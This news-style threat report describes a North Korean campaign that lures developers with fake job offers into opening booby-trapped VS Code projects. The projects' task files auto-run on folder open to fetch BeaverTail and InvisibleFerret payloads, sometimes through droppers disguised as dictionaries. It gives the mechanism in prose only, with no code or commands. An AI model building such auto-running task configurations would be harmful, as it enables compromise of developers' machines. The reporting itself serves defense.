North Korean Hackers Exploit Visual Studio Code to Infiltrate Developer Systems
In a sophisticated cyber espionage campaign, North Korean state-sponsored hackers have been targeting software developers by leveraging malicious Microsoft Visual Studio Code (VS Code) projects. This tactic is part of the ongoing Contagious Interview campaign, which has been evolving since its initial discovery in December 2025.
The attackers initiate contact with potential victims under the guise of offering job opportunities or collaborative projects. They instruct these individuals to clone a repository from platforms like GitHub, GitLab, or Bitbucket and open the project in VS Code. Unbeknownst to the victims, these repositories are booby-trapped with malicious configurations designed to execute harmful code upon opening.
The core of this attack lies in the manipulation of VS Code’s task configuration files. By setting the runOn: folderOpen option, the attackers ensure that the malicious tasks execute automatically when the project folder is opened. This mechanism retrieves and runs payloads hosted on Vercel domains, tailored to the operating system of the compromised machine. The primary payloads identified in these attacks are known as BeaverTail and InvisibleFerret, both of which provide the attackers with remote code execution capabilities.
To enhance the resilience of their malware delivery, the threat actors have incorporated multi-stage droppers disguised as benign spell-check dictionaries within the task configuration files. This serves as a fallback, ensuring the deployment of the malicious payload even if the primary method fails. The obfuscated JavaScript embedded in these files executes upon opening the project, establishing communication with a remote server and executing any received JavaScript code. The final stage involves another layer of heavily obfuscated JavaScript, further complicating detection and analysis.
A notable evolution in this campaign is the exploitation of VS Code’s trust feature. When a developer opens a project, VS Code prompts them to trust the repository’s author. If the developer grants this trust, the application processes the repository’s tasks.json configuration file, potentially executing embedded arbitrary commands. On macOS systems, this results in the execution of background shell commands that retrieve and run JavaScript payloads, establishing a persistent execution loop that allows the attackers to harvest system information and maintain continuous communication with the compromised host.
This campaign underscores the increasing sophistication of North Korean cyber operations and their focus on infiltrating the software development community. By exploiting trusted development tools and platforms, these threat actors can gain access to sensitive information and potentially compromise the supply chain of software products.
